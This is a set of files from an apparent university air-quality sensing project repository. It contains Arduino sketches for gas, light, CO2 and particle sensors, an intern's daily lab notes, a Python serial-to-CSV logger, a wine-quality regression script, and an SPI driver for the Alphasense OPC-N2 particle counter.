float concentrations[8] = {gas.measureNH3(), gas.measureCO2(), gas.measureNO2(), gas.measureC3H8(), gas.measureC4H10(), gas.measureCH4(), gas.measureH2(), gas.measureC2H5OH()};
for (int i = 0; i < 8; i++) {
Serial.print("The concentration of ");
Serial.print(gasses[i]);
Serial.print(" is:");
if (concentrations[i] >= 0) {
Serial.print(concentrations[i]);
} else {
Serial.print("invalid");
}
Serial.println(" ppm\n");
}
delay(1000);
Serial.println("---");
}
~~~~
#### 4.4: Grove Sunlight Sensor: Visible, IR, UV Light
Following is the code for displaying visible, IR, and UV light brightness. Visible and IR measured in lumens while UV measured by UV index.
- Include libraries
- Initialize SI1145 as instance of SI114X object
- Setup
- - Initialize Serial with baud rate 9600 and print when sensor is initialized
- Loop
- - Compute and print readings for visible, IR, UV
- - Note that UV index is UV in lumens divided by 100
- - Delay 1 second for stability and readability
~~~~
/*
Adapted from example code
*/
#include <Arduino.h>
#include <Wire.h>
#include "SI114X.h"
SI114X SI1145 = SI114X();
void setup() {
Serial.begin(9600);
Serial.println("Beginning Si1145!");
while (!SI1145.Begin()) {
Serial.println("Si1145 is not ready!");
delay(1000);
}
Serial.println("Si1145 is ready!");
}
void loop() {
Serial.print("---\n");
Serial.println("Vis: "); Serial.println(SI1145.ReadVisible());
Serial.println("IR: ");
Serial.println(SI1145.ReadIR());
//the real UV value must be div 100 from the reg value , datasheet for more information.
Serial.println("UV: ");
Serial.println(float(SI1145.ReadUV())/100);
delay(1000);
}
~~~~
- The receiving baud rate had to be set to 115200 instead of 9600 for unknown reasons, even though Serial.begin was called with an argument of 9600. It could be a bug in the Nano, or it may simply be how the SI114X sensor behaves.
- Lastly all sensors were connected to the Nano and used simultaneously.
All code can be found under NanoUTD/sensorCode.
**Homework:**
- ~~Finish daily notes~~
- ~~Make Basic Python Projects~~
- ~~Start learning Python-TensorFlow~~
- Learn mechanics of RNNs, LSTM, CNNs
References for quadrotor SLAM - CNNs for 2D images to depth mapping:
(1): http://visual.cs.ucl.ac.uk/pubs/monoDepth/
(2): https://github.com/mrharicot/monodepth/
__________________________________________________________________________________________________________________________________
## Tuesday August 6, 2019
Today's work consisted of two main tasks.
### Task 5: Construct Large Checkerboard Grid for Overlay Calibration of Thermal and Rgb Cameras
Lakitha is working on overlaying images of a thermal and rgb camera for various distances. He has calibrated them for short distances with a small chess board, but for larger distances he needed a larger grid. Thus, we built that by pasting aluminum squares (cold) on a foam board (warm).
High level program flow can be found in this directory as `VapeDetectorProgramFlow.jpg`
### Task 6: Develop Python Script for Saving Ozone Sensor Data to CSV
Using the PuTTY terminal emulator, we communicated with Ozone Sensor 108L to print ozone concentration, temperature, pressure, and voltage. A Python script was developed to convert data received from Sensor 108L to csv format and save it. This script can be found in this directory as SerialReaderOzone.py.
Receiving baudrate was 2400.
Program's basic flow was receiving sensor data and saving it in a dictionary, then logging each dictionary update to csv format in a separate directory.
After saving to csv we noticed that '\n' and '\r' and '~' was appearing in the csv which was undesirable, thus we using `string.rstrip(k)` for `k in ['\n', '\r', '~']` to rid each line of these characters.
**Homework:**
- ~~Finish daily notes~~
________________________________________________________________________________________________________________________________________
## Wednesday August 7th, 2019
Today's work was similar to day 2. Adam and I built Shinyei sensor central management units. I made 5 and he cranked out 10 for a total of 15. They are almost 3/4th the way to their 100 units goal.
A picture of what the final product looks like can be found in this directory as `ShinyeiCMUPicture.jpg`.
<file_sep>import serial
import csv
import os
from datetime import datetime
import serialDefinitions as fl
import json
import serial.tools.list_ports
# Timestamp of script start — makeCSV uses it to pick the day's folder and file.
now = datetime.utcnow()
def fillDict(dict, data):
    """Populate *dict* in place from a colon-separated sensor payload.

    Fields are assigned to the dict's keys in declaration order; a
    placeholder 0 is prepended so the first key ("utc-time") is skipped,
    then "utc-time" is stamped with the current UTC time.
    """
    fields = [0] + data.split(":")
    for key, value in zip(dict.keys(), fields):
        dict[key] = value
    dict["utc-time"] = datetime.utcnow()
def makeCSV(dict, name):
    """Append *dict* as one row to the sensor's daily CSV file.

    The directory and filename are derived from the script start time
    (module-level ``now``) via the serialDefinitions helpers; a header row
    is written only when the file is first created.
    """
    #Find/make directory
    dir = fl.getDirPath(now)
    if(not(os.path.exists(dir))):
        os.makedirs(dir)
    #Find/make file path
    filePath = fl.getFilePath(now, dir, name)
    makeHeader = not(os.path.isfile(filePath))
    #Get keys
    keys = list(dict.keys())
    #Input data to file — the with-block closes the file on exit; the old
    #explicit csvFile.close() inside the block was redundant and removed.
    with open(filePath, "a") as csvFile:
        writer = csv.DictWriter(csvFile, fieldnames=keys)
        if(makeHeader):
            writer.writeheader()
        writer.writerow(dict)
def processData(data):
    """Route one framed sensor message to its dict/JSON/CSV handlers.

    *data* looks like ``#mintsO!<sensor>><payload>``; the prefix before the
    first '>' selects which sensor dictionary to fill and persist.
    """
    print(data)
    parts = data.split(">")
    # Dispatch table replaces the original repetitive if/elif chain:
    # message prefix -> (sensor name, sensor record dictionary).
    sensors = {
        "#mintsO!PPD42NSDuo": ("PPD42NSDuo", PPD42NSDuo),
        "#mintsO!BME280": ("BME280", BME280),
        "#mintsO!MGS001": ("MGS001", MGS001),
        "#mintsO!SCD30": ("SCD30", SCD30),
        "#mintsO!OPCN2": ("OPCN2", OPCN2),
    }
    try:
        if parts[0] in sensors:
            name, sensorDict = sensors[parts[0]]
            fillDict(sensorDict, parts[1])
            jsonMaker(name + ".json", sensorDict)
            makeCSV(sensorDict, name)
    except Exception:
        # Was a bare except; narrowed so KeyboardInterrupt/SystemExit
        # are no longer silently swallowed.
        print("Data cannot be processed")
def jsonMaker(fileName, dict):
    """Serialize *dict* to *fileName* as JSON (non-JSON values fall back to str)."""
    with open(fileName, 'w') as out:
        out.write(json.dumps(dict, default=str))
#Create a dictionary for each sensor's variables
BME280 = {"utc-time": 0, "temperature": 0, "pressure": 0, "humidity": 0, "altitude": 0}
MGS001 = {"utc-time": 0, "nh3": 0, "co": 0, "no2": 0, "c3h8": 0, "c4h10": 0, "ch4": 0, "h2": 0, "c2h5oh": 0}
OPCN2 = {"utc-time": 0, "valid": 0, "binCount0": 0, "binCount1": 0, "binCount2": 0, "binCount3": 0, "binCount4": 0, "binCount5": 0, "binCount6": 0, "binCount7": 0,
"binCount8": 0, "binCount9": 0, "binCount10": 0, "binCount11": 0, "binCount12": 0, "binCount13": 0, "binCount14": 0, "binCount15": 0,
"bin1TimeToCross": 0, "bin3TimeToCross": 0, "bin5TimeToCross": 0, "bin7TimeToCross": 0, "sampleFlowRate": 0, "temperatureOrPressure": 0, "samplingPeriod": 0, "checkSum": 0,
"pm1": 0, "pm2_5": 0, "pm10": 0}
SCD30 = {"utc-time": 0, "co2": 0, "temperature": 0, "humidity": 0}
PPD42NSDuo = {"utc-time": 0, "sampleTimeSeconds": 0, "LPOPmMid": 0, "LPOPm10": 0, "ratioPmMid": 0, "ratioPm10": 0, "concentrationPmMid": 0, "concentrationPm2_5": 0, "concentrationPm10": 0}
#Set up serial port
# Enumerate the attached serial devices and open one at 9600 baud with a
# 5-second read timeout.
# NOTE(review): connected[2] assumes at least three serial ports exist and
# that the sensor hub is the third one enumerated — confirm on the
# deployment machine; an IndexError here aborts the script at startup.
li = serial.tools.list_ports.comports()
connected = []
for element in li:
    connected.append(element.device)
ser = serial.Serial(port=connected[2], baudrate=9600, timeout=5)
#Read data
# Main loop: consume the serial stream one character at a time.  A record
# starts at '#' and ends at '~'; characters outside a record are echoed to
# stdout unchanged.
curData = ""
reading = False
while True:
    try:
        char = ser.read(1).decode('utf-8')
        if char == '#':
            # Start of a new record: reset the accumulator.
            reading = True
            curData = str(char)
        elif char == '~':
            # End of record: hand the accumulated text off for processing.
            processData(curData)
            curData = ""
            reading = False
        elif reading:
            curData = curData + str(char)
        else:
            print(str(char), end="")
    except Exception as err:
        # Narrowed from a bare ``except:`` so Ctrl-C (KeyboardInterrupt)
        # can still stop the loop; the usual failure here is a
        # UnicodeDecodeError on line noise.
        print("Data not received:", err)
<file_sep># -*- coding: utf-8 -*-
import pandas as pd
import matplotlib.pyplot as plt
from sklearn import linear_model
from sklearn.model_selection import train_test_split
from sklearn.metrics import mean_squared_error
# load dataset
# NOTE(review): the path is relative to the current working directory —
# confirm the CSV exists there before running.
data = pd.read_csv("../downloads/winequality.csv")
# Bare expression: the (rows, cols) shape is computed but discarded — a
# notebook-style leftover with no effect in a script; wrap in print() if
# the output is wanted.
data.shape
def thing(x):
    """Return *x* shifted down by 2 (helper; appears unused in this file)."""
    return -2 + x
# clean dataset
# Replace any null cells with 0.  Idiomatic fillna instead of the original
# boolean-mask assignment (data[data.isnull()] = 0) — same result, clearer.
data = data.fillna(0)
# Ad-hoc centering/scaling of selected feature columns.
data["free sulfur dioxide"] = data["free sulfur dioxide"].apply(lambda x: (x - 15) / 10)
data["pH"] = data["pH"].apply(lambda x: (x - 3.5) * 2)
# "thing" is not a standard winequality column; guard so a missing column
# does not abort the whole script with a KeyError.
if "thing" in data.columns:
    data["thing"] = data["thing"].apply(lambda x: x - 9)
data["total sulfur dioxide"] = data["total sulfur dioxide"].apply(lambda x: (x - 100) / 50)
data["fixed acidity"] = data["fixed acidity"].apply(lambda x: x - 8)
data["residual sugar"] = data["residual sugar"].apply(lambda x: x - 2)
# Quick sanity check of the rescaled pH distribution.
plt.figure(0)
plt.hist(data["pH"])
# Train/test split (80/20) for predicting wine quality from the
# physicochemical columns.
train, test = train_test_split(data, test_size=0.2)
# Inputs: every column up to and including "sulphates"; target: "quality".
train_in = train.loc[:, :"sulphates"]
train_out = train["quality"]
test_in = test.loc[:, :"sulphates"]
test_out = test["quality"]
# Ordinary least-squares baseline.
reg = linear_model.LinearRegression()
reg.fit(train_in, train_out)
pred = reg.predict(test_in)
# Predicted vs. actual quality on the held-out set.
plt.figure(1)
plt.xlabel("quality")
plt.ylabel("prediction")
plt.plot(test_out, pred, 'o')
print("Linear reg error ", mean_squared_error(pred, test_out))
# Small multi-layer perceptron on the same train/test split.
from sklearn.neural_network import MLPRegressor

nn = MLPRegressor(
    hidden_layer_sizes=(3, 2),
    activation='relu',
    solver='lbfgs',
    alpha=0.001,
    batch_size=10,
    learning_rate="constant",
    max_iter=5000,
    tol=0.0005,
    verbose=False,
)
nn.fit(train_in, train_out)
nn_pred = nn.predict(test_in)
nn_trained = nn.predict(train_in)
# Overlay train (red) and test (blue) predictions against true quality.
plt.figure(2)
plt.xlabel("quality")
plt.ylabel("prediction")
plt.plot(train_out, nn_trained, 'ro')
plt.plot(test_out, nn_pred, 'bo')
print("Neural Network error ", mean_squared_error(nn_pred, test["quality"]))
print("Neural Network trained error ", mean_squared_error(nn_trained, train["quality"]))
# Random Forest
# Forest of 100 depth-limited trees for comparison with the models above.
from sklearn.ensemble import RandomForestRegressor

regr = RandomForestRegressor(max_depth=15, random_state=0, n_estimators=100)
regr.fit(train_in, train_out)
# Per-feature importances learned by the forest.
print(regr.feature_importances_)
rf_pred = regr.predict(test_in)
train_pred = regr.predict(train_in)
# Train (blue) vs. test (red) predictions against true quality.
plt.figure(3)
plt.xlabel("quality")
plt.ylabel("prediction")
plt.plot(train_out, train_pred, 'bo')
plt.plot(test_out, rf_pred, 'ro')
print("Random Forest error ", mean_squared_error(rf_pred, test_out))
<file_sep>/*
Written by <NAME>
Displays concentrations of NH3, CO, NO2, C3H8, C4H10, CH4, H2, C2H5OH.
*/
#include <Arduino.h>
#include <Wire.h>
#include "MutichannelGasSensor.h"
// One-time initialization: bring up the serial link and the multichannel
// gas sensor.
void setup()
{
    Serial.begin(9600);   // host link at 9600 baud
    gas.begin(0x04);      // the default I2C address of the slave is 0x04
    gas.powerOn();        // power the sensor on
}
// Print a concentration line for each gas once per second.
void loop()
{
    // BUG FIX: the original declared `char gasses[8] = {'NH3', ...}` using
    // multi-character char literals, whose value is implementation-defined
    // and truncates to a single byte — the gas names never printed.
    // Gas names must be C strings.
    const char *gasses[8] = {"NH3", "CO", "NO2", "C3H8", "C4H10", "CH4", "H2", "C2H5OH"};
    // TODO(review): placeholder values — replace with real readings from
    // the gas sensor (MutichannelGasSensor measurement calls).
    float concentrations[8] = {1, 2, 3, 4, 5, 6, 7, 8};
    for (int i = 0; i < 8; i++) {
        Serial.print("The concentration of ");
        Serial.print(gasses[i]);
        Serial.print(" is:");
        if (concentrations[i] >= 0) {
            Serial.print(concentrations[i]);
        } else {
            // Negative readings are treated as sensor errors.
            Serial.print("invalid");
        }
        Serial.println(" ppm\n");
    }
    delay(1000);
    Serial.println("---");
}
<file_sep># Image Processing Tutorial
## Ex 1 Reading an Image
<file_sep># Daily Notes
## 06/24/2019 Monday
### 1.1 Learned how to assemble the Shinyei with soldering and wiring
#### 1.1.1 The frayed wires are a pain </br>
#### 1.1.2 Adam discovered that by separating the wires attached to the load so that they go to both of the sensors simultaneously (as
opposed to being wired in parallel), the accident rate (breaking solder) was cut down in addition to manufacturing time </br>
### 1.2 Watched one Shinyei be put together (by Adam) </br>
### 1.3 Helped Adam manufacture 3 Shinyeis (I did more of the soldering while he did more of the wiring) </br>
## 06/25/2019 Tuesday
### 1.1 Created Arduino account </br>
#### 1.1.1 Arduino Username: norad42; email: <EMAIL>; password: <PASSWORD>:: </br>
#### 1.1.2 Github Username: norad02; email: <EMAIL>; password: <PASSWORD>:: </br>
### 2.1 Ran Lakitha's second Github exercise </br>
#### 2.1.1
```
// the setup routine runs once when you press reset:
void setup() {
// initialize serial communication at 9600 bits per second:
Serial.begin(9600);
}
// the loop routine runs over and over again forever:
void loop() {
// print out a String of your choice
Serial.println("Hello MINTS: Multi-scale Integrated Sensing and Simulation");
// Delay for 1000 miliseconds
delay(1000); // delay in between reads for stability
}
3.1 Ran Lakitha's third Github exercise
3.1.1 void setup() {
// initialize digital pin LED_BUILTIN as an output.
pinMode(LED_BUILTIN, OUTPUT);
}
// the loop function runs over and over again forever
void loop() {
digitalWrite(LED_BUILTIN, HIGH); // turn the LED on (HIGH is the voltage level)
delay(1000); // wait for a second
digitalWrite(LED_BUILTIN, LOW); // turn the LED off by making the voltage LOW
delay(1000); // wait for a second
}
```
### 4.1 Downloaded the Arduino app on my computer </br>
### 5.1 Download Atom and the PlatformIO </br>
#### 5.1.1 Code for the CO2 & Temperature & Humidity Sensor (SCD30) </br>
```
#include <Arduino.h>
#include <Wire.h>
#include "SparkFun_SCD30_Arduino_Library.h"
SCD30 airSensor;
void setup()
{
Wire.begin();
Serial.begin(9600);
Serial.println("SCD30 Example");
airSensor.begin(); //This will cause readings to occur every two seconds
}
void loop()
{
if (airSensor.dataAvailable())
{
Serial.print("co2(ppm):");
Serial.print(airSensor.getCO2());
Serial.print(" temp(C):");
Serial.print(airSensor.getTemperature(), 1);
Serial.print(" humidity(%):");
Serial.print(airSensor.getHumidity(), 1);
Serial.println();
}
else
Serial.println("No data");
delay(1000);
}
```
#### 5.1.2 Code for the Barometer Sensor (BME280) </br>
```
#include <Arduino.h>
#include "Seeed_BME280.h"
#include <Wire.h>
BME280 bme280;
void setup()
{
Serial.begin(9600);
if(!bme280.init()){
Serial.println("Device error!");
}
}
void loop()
{
float pressure;
//get and print temperatures
Serial.print("Temp: ");
Serial.print(bme280.getTemperature());
Serial.println("C");//The unit for Celsius because original arduino don't support speical symbols
//get and print atmospheric pressure data
Serial.print("Pressure: ");
Serial.print(pressure = bme280.getPressure());
Serial.println("Pa");
//get and print altitude data
Serial.print("Altitude: ");
Serial.print(bme280.calcAltitude(pressure));
Serial.println("m");
//get and print humidity data
Serial.print("Humidity: ");
Serial.print(bme280.getHumidity());
Serial.println("%");
delay(1000);
}
```
#### 5.1.3 Code for the Sunlight Sensor </br>
```
#include <Wire.h>
#include "Arduino.h"
#include "SI114X.h"
SI114X SI1145 = SI114X();
void setup() {
Serial.begin(9600);
Serial.println("Beginning Si1145!");
while (!SI1145.Begin()) {
Serial.println("Si1145 is not ready!");
delay(1000);
}
Serial.println("Si1145 is ready!");
}
void loop() {
Serial.print("//--------------------------------------//\r\n");
Serial.print("Vis: "); Serial.println(SI1145.ReadVisible());
Serial.print("IR: "); Serial.println(SI1145.ReadIR());
//the real UV value must be div 100 from the reg value , datasheet for more information.
Serial.print("UV: "); Serial.println((float)SI1145.ReadUV()/100);
delay(1000);
}
```
#### 5.1.4 The library for the Light & Gesture & Color & Proximity Sensor is nowhere to be found on Atom/PlatformIO </br>
##### 5.1.4.1 Imbar says that Lakitha will show us later </br>
### 6.1 The Github that I downloaded onto my Windows refused to run </br>
## 07/09/2019 Tuesday </br>
### 1.1 I am learning Python </br>
```
a = 5
b = 6
print(9 * a + b)
```
#### This prints 51
##### This is how you run code:
```
C:\Users\norad\Desktop\Python-lesson>python lesson1.py
```
##### This site: https://www.programiz.com/python-programming/tutorial has a lot of helpful information on it.
## 07/30/2019 Monday </br>
### 1.1 I am learning Python </br>
### It's a learning curve </br>
### I am learning how to upload a picture (in both color and grayscale) </br>
### I started to learn how to use RGB to design my own picture </br>
<file_sep>#ifndef OPCN2_NANO_MINTS_H
#define OPCN2_NANO_MINTS_H
#include <Arduino.h>
#include <SPI.h>
// Driver for the Alphasense OPC-N2 optical particle counter over SPI.
// Each transaction asserts the chip-select pin given to the constructor and
// exchanges command/response bytes with SPI.transfer().
class OPCN2NanoMints
{
private:
// attributes
// SPI chip-select (slave-select) pin wired to the OPC-N2.
uint8_t alphaSlavePin;
public:
OPCN2NanoMints(uint8_t chipSelect);
// Alpha Sensor Functions
// Configure the SPI bus (MSB-first, mode 1) and the chip-select pin.
void begin();
// Full power-up sequence; returns true when fan and laser report on.
bool initialize();
// Assert / release the chip-select line around one transaction.
void beginTransfer();
void endTransfer();
// Dump the command-echo byte plus the response bytes to Serial.
void printBytesRead(byte initial[],byte dataIn[], int sizeOfArray) ;
// Switch fan and laser together, or individually.
struct fanAndLaserStatus setFanAndLaserStatus(bool status);
struct fanStatus setFanStatus(bool status);
struct laserStatus setLaserStatus(bool status);
// Set drive levels through the on-board digital potentiometer.
struct laserPower setLaserPower(byte laserPower);
struct fanPower setFanPower(byte fanPower);
struct digitalPotStatus readDigitalPotStatus();
// Identification / firmware queries.
struct informationString readInformationString();
struct serialNumber readSerialNumber();
struct firmwareVersion readFirmwareVersion();
// There are two configuration-variable pages; both are currently dumped
// raw to Serial (decoded structs are commented out below).
void readConfigurationVariables();
void readConfigurationVariables2();
// Measurement reads.
struct histogramData readHistogramData() ;
struct pmData readPMData() ;
// Serial banner helpers.
void printMintsBegin();
void printMintsEnd();
// True when the first *size* bytes of the two arrays match.
bool comparator(byte arrayOne[], byte arraTwo[], int size);
};
// Result of setFanAndLaserStatus(): the state that was requested, plus
// whether the sensor acknowledged the command (echoed the expected 0xF3
// ready byte).
struct fanAndLaserStatus
{
bool fanAndLaserOn;
bool valid;
};
// Result of setFanStatus().
struct fanStatus
{
bool fanOn;
bool valid;
};
// Result of setLaserStatus().
struct laserStatus
{
bool laserOn;
bool valid;
};
// Result of setFanPower(): DAC drive value applied to the fan.
struct fanPower
{
uint8_t fanPower;
bool valid;
};
// Result of setLaserPower(): DAC drive value applied to the laser.
struct laserPower
{
uint8_t laserPower;
bool valid;
};
// Digital-pot status response: fan/laser on-off flags and their DAC values.
struct digitalPotStatus
{
uint8_t fanOn;
uint8_t laserOn;
uint8_t fanDACVal;
uint8_t laserDACVal;
bool valid;
};
// 60-character information string reported by the sensor.
struct informationString
{
String information;
bool valid;
};
// 60-character serial-number string reported by the sensor.
struct serialNumber
{
String serial;
bool valid;
};
// Firmware version, reported as major.minor.
struct firmwareVersion
{
uint8_t major;
uint8_t minor;
bool valid;
};
//
// struct configurationVariables
// {
//
// uint16_t binBoundries0;
// uint16_t binBoundries1;
// uint16_t binBoundries2;
// uint16_t binBoundries3;
// uint16_t binBoundries4;
// uint16_t binBoundries5;
// uint16_t binBoundries6;
// uint16_t binBoundries7;
// uint16_t binBoundries8;
// uint16_t binBoundries9;
// uint16_t binBoundries10;
// uint16_t binBoundries11;
// uint16_t binBoundries12;
// uint16_t binBoundries13;
// uint16_t binBoundries14;
//
// uint16_t binBoundriesSpare;
//
// float binParticleVolume0;
// float binParticleVolume1;
// float binParticleVolume2;
// float binParticleVolume3;
// float binParticleVolume4;
// float binParticleVolume5;
// float binParticleVolume6;
// float binParticleVolume7;
// float binParticleVolume8;
// float binParticleVolume9;
// float binParticleVolume10;
// float binParticleVolume11;
// float binParticleVolume12;
// float binParticleVolume13;
// float binParticleVolume14;
// float binParticleVolume15;
//
// float binParticleDensity0;
// float binParticleDensity1;
// float binParticleDensity2;
// float binParticleDensity3;
// float binParticleDensity4;
// float binParticleDensity5;
// float binParticleDensity6;
// float binParticleDensity7;
// float binParticleDensity8;
// float binParticleDensity9;
// float binParticleDensity10;
// float binParticleDensity11;
// float binParticleDensity12;
// float binParticleDensity13;
// float binParticleDensity14;
// float binParticleDensity15;
//
// float binSampleVolumeWeight0;
// float binSampleVolumeWeight1;
// float binSampleVolumeWeight2;
// float binSampleVolumeWeight3;
// float binSampleVolumeWeight4;
// float binSampleVolumeWeight5;
// float binSampleVolumeWeight6;
// float binSampleVolumeWeight7;
// float binSampleVolumeWeight8;
// float binSampleVolumeWeight9;
// float binSampleVolumeWeight10;
// float binSampleVolumeWeight11;
// float binSampleVolumeWeight12;
// float binSampleVolumeWeight13;
// float binSampleVolumeWeight14;
// float binSampleVolumeWeight15;
//
// float gainScalingCoefficient;
// float sampleFlowRate;
//
// uint8_t laserDACVal;
// uint8_t fanDACVal;
// uint8_t tofToSfrFactor;
//
// uint8_t spare0;
// uint8_t spare1;
// uint8_t spare2;
// uint8_t spare3;
// uint8_t spare4;
// uint8_t spare5;
// uint8_t spare6;
// uint8_t spare7;
// uint8_t spare8;
// uint8_t spare9;
// uint8_t spare10;
// uint8_t spare11;
// uint8_t spare12;
// uint8_t spare13;
// uint8_t spare14;
// uint8_t spare15;
// uint8_t spare16;
// uint8_t spare17;
// uint8_t spare18;
// uint8_t spare19;
// uint8_t spare20;
//
// bool valid;
// };
//
//
// struct configurationVariables2
// {
//
// uint16_t AMSamplingIntervalCount;
// uint16_t AMIdleIntervalCount;
// uint8_t AMFanOnInIdle;
// uint8_t AMLaserOnInIdle;
// uint16_t AMMaxDataArraysInFile;
// uint8_t AMOnlySavePMData;
//
// bool valid;
// };
// One decoded histogram frame: particle counts per size bin, time-to-cross
// samples, flow/timing metadata, a checksum and the derived PM values.
// Field order mirrors the raw 62-byte response (filled via memcpy in
// readHistogramData()).
struct histogramData
{
uint16_t binCount0 ;
uint16_t binCount1 ;
uint16_t binCount2 ;
uint16_t binCount3 ;
uint16_t binCount4 ;
uint16_t binCount5 ;
uint16_t binCount6 ;
uint16_t binCount7 ;
uint16_t binCount8 ;
uint16_t binCount9 ;
uint16_t binCount10 ;
uint16_t binCount11 ;
uint16_t binCount12 ;
uint16_t binCount13 ;
uint16_t binCount14 ;
uint16_t binCount15 ;
uint8_t bin1TimeToCross ;
uint8_t bin3TimeToCross ;
uint8_t bin5TimeToCross ;
uint8_t bin7TimeToCross ;
float sampleFlowRate ;
uint32_t temperatureOrPressure ;
float samplingPeriod ;
uint16_t checkSum ;
float pm1 ;
float pm2_5 ;
float pm10 ;
// Set from the command-echo comparison, not from the payload.
bool valid;
};
// PM1 / PM2.5 / PM10 values decoded from the 12-byte PM-data response.
struct pmData
{
float pm1 ;
float pm2_5 ;
float pm10 ;
// Set from the command-echo comparison, not from the payload.
bool valid;
};
#endif
<file_sep>/***************************************************************************
OPCN2NanoMints
---------------------------------
Written by: <NAME>
- for -
Mints: Multi-scale Integrated Sensing and Simulation
---------------------------------
Date: April 19th, 2019
---------------------------------
This library is written for the Alphasense OPCN2 optical particle counter.
----------------> http://www.alphasense.com/WEB1213/wp-content/uploads/2018/02/OPC-N3.pdf
--------------------------------------------------------------------------
https://github.com/mi3nts
http://utdmints.info/
***************************************************************************/
#include "OPCN2NanoMints.h"
#include <Arduino.h>
#include <SPI.h>
/***************************************************************************
PRIVATE FUNCTIONS
***************************************************************************/
// Remember the chip-select (slave-select) pin used to address the sensor.
OPCN2NanoMints::OPCN2NanoMints(uint8_t chipSelect) : alphaSlavePin(chipSelect) {}
// Alpha Sensor Functions
// Configure the SPI bus for the OPC-N2 — MSB-first, SPI mode 1, clock /32 —
// and park the chip-select line high (deselected).  The statement order and
// delays are part of the bring-up sequence; do not reorder.
void OPCN2NanoMints::begin()
{
  printMintsBegin();
  Serial.println("Initiating SPI ");
  SPI.begin();
  SPI.setBitOrder(MSBFIRST);
  delay(1000);
  pinMode(alphaSlavePin,OUTPUT);
  digitalWrite(alphaSlavePin,HIGH);   // deselect until a transfer starts
  SPI.setDataMode(SPI_MODE1);
  SPI.setClockDivider(SPI_CLOCK_DIV32);
  delay(400);
  Serial.println("---------------------------- ");
  printMintsEnd();
}
// Full power-up sequence: bring up SPI, query identity/configuration (the
// results are only echoed to Serial), switch the fan and laser on, wait,
// then confirm via the digital-pot status.
// Returns true only when the on-command was acknowledged AND the pot status
// reports both fan and laser on.
bool OPCN2NanoMints::initialize(){
  delay(1000);
  begin();
  delay(1000);
  readDigitalPotStatus();
  delay(1000);
  readInformationString();
  delay(1000);
  readSerialNumber();
  delay(1000);
  readFirmwareVersion();
  delay(1000);
  readConfigurationVariables();
  delay(1000);
  readConfigurationVariables2();
  delay(1000);
  struct fanAndLaserStatus fanAndLaserState = setFanAndLaserStatus(true);
  delay(10000);   // give the fan time to spin up before checking status
  struct digitalPotStatus digitalPotState = readDigitalPotStatus();
  readPMData() ;
  return (fanAndLaserState.valid&&fanAndLaserState.fanAndLaserOn)&&(digitalPotState.fanOn&&digitalPotState.laserOn);
}
// Turn the fan and laser on (status=true) or off (status=false).
// Returns the requested state plus a validity flag derived from comparing
// the sensor's command-echo byte against the expected 0xF3.
struct fanAndLaserStatus OPCN2NanoMints::setFanAndLaserStatus(bool status){
  printMintsBegin();
  Serial.println("Setting Fan and Laser Status");
  int size = 1;
  byte validator = 0XF3;   // expected command-echo byte from the OPC
  byte initial;
  byte dataIn[size];
  byte inputByte = 0X03;   // command byte (see OPC-N2 SPI protocol)
  if(status){
    Serial.println("Turning Fan and Laser On");
    beginTransfer();
    initial = SPI.transfer(inputByte);
    delay(10);
    dataIn[0] = SPI.transfer(0X00);   // sub-command: fan + laser on
    endTransfer();
  }else{
    Serial.println("Turning Fan and Laser Off");
    beginTransfer();
    initial = SPI.transfer(inputByte);
    delay(10);
    dataIn[0] = SPI.transfer(0X01);   // sub-command: fan + laser off
    endTransfer();
  }
  printBytesRead(&initial, dataIn, size);   // BUG FIX: parameter is byte[], pass address
  fanAndLaserStatus dataOutput;
  dataOutput.valid = comparator(&validator, &initial, 1);   // BUG FIX: byte* args, not scalars
  dataOutput.fanAndLaserOn = status;
  Serial.print("Validity: ");
  Serial.println(dataOutput.valid);
  Serial.print(dataOutput.fanAndLaserOn); Serial.print(" ");
  printMintsEnd();
  return dataOutput;
}
// Turn only the fan on (status=true) or off (status=false).
struct fanStatus OPCN2NanoMints::setFanStatus(bool status) {
  printMintsBegin();
  Serial.println("Setting Fan Status");
  int size = 1;
  byte validator = 0XF3;   // expected command-echo byte from the OPC
  byte initial;
  byte dataIn[size];
  byte inputByte = 0X03;   // command byte (see OPC-N2 SPI protocol)
  if(status){
    Serial.println("Turning Fan On");
    beginTransfer();
    initial = SPI.transfer(inputByte);
    delay(10);
    dataIn[0] = SPI.transfer(0X04);   // sub-command: fan on
    endTransfer();
  }else{
    Serial.println("Turning Fan Off");
    beginTransfer();
    initial = SPI.transfer(inputByte);
    delay(10);
    dataIn[0] = SPI.transfer(0X05);   // sub-command: fan off
    endTransfer();
  }
  printBytesRead(&initial, dataIn, size);   // BUG FIX: parameter is byte[], pass address
  fanStatus dataOutput;
  dataOutput.valid = comparator(&validator, &initial, 1);   // BUG FIX: byte* args, not scalars
  dataOutput.fanOn = status;
  Serial.print("Validity: ");
  Serial.println(dataOutput.valid);
  Serial.print(dataOutput.fanOn); Serial.print(" ");
  printMintsEnd();
  delay(1000);
  return dataOutput;
}
// Turn only the laser on (status=true) or off (status=false).
struct laserStatus OPCN2NanoMints::setLaserStatus(bool status){
  printMintsBegin();
  Serial.println("Setting Laser Status");
  int size = 1;
  byte validator = 0XF3;   // expected command-echo byte from the OPC
  byte initial;
  byte dataIn[size];
  byte inputByte = 0X03;   // command byte (see OPC-N2 SPI protocol)
  if(status){
    Serial.println("Turning Laser On");
    beginTransfer();
    initial = SPI.transfer(inputByte);
    delay(10);
    dataIn[0] = SPI.transfer(0X02);   // sub-command: laser on
    endTransfer();
  }else{
    Serial.println("Turning Laser Off");
    beginTransfer();
    initial = SPI.transfer(inputByte);
    delay(10);
    dataIn[0] = SPI.transfer(0X03);   // sub-command: laser off
    endTransfer();
  }
  printBytesRead(&initial, dataIn, size);   // BUG FIX: parameter is byte[], pass address
  laserStatus dataOutput;
  dataOutput.valid = comparator(&validator, &initial, 1);   // BUG FIX: byte* args, not scalars
  dataOutput.laserOn = status;
  Serial.print("Validity: ");
  Serial.println(dataOutput.valid);
  Serial.print(dataOutput.laserOn); Serial.print(" ");
  printMintsEnd();
  delay(1000);
  return dataOutput;
}
// Query fan/laser on-off state and their DAC drive values (4-byte response).
struct digitalPotStatus OPCN2NanoMints::readDigitalPotStatus() {
  printMintsBegin();
  Serial.println("Reading Digital Pot Status");
  int size = 4;
  byte validator = 0XF3;   // expected command-echo byte from the OPC
  byte initial;
  byte dataIn[size];
  byte inputByte = 0X13;
  beginTransfer();
  initial = SPI.transfer(inputByte);
  delayMicroseconds(9990);   // allow the sensor to stage the payload
  for (int i = 0; i < size; i++)
  {
    delayMicroseconds(10);
    dataIn[i] = SPI.transfer(inputByte);
  }
  endTransfer();
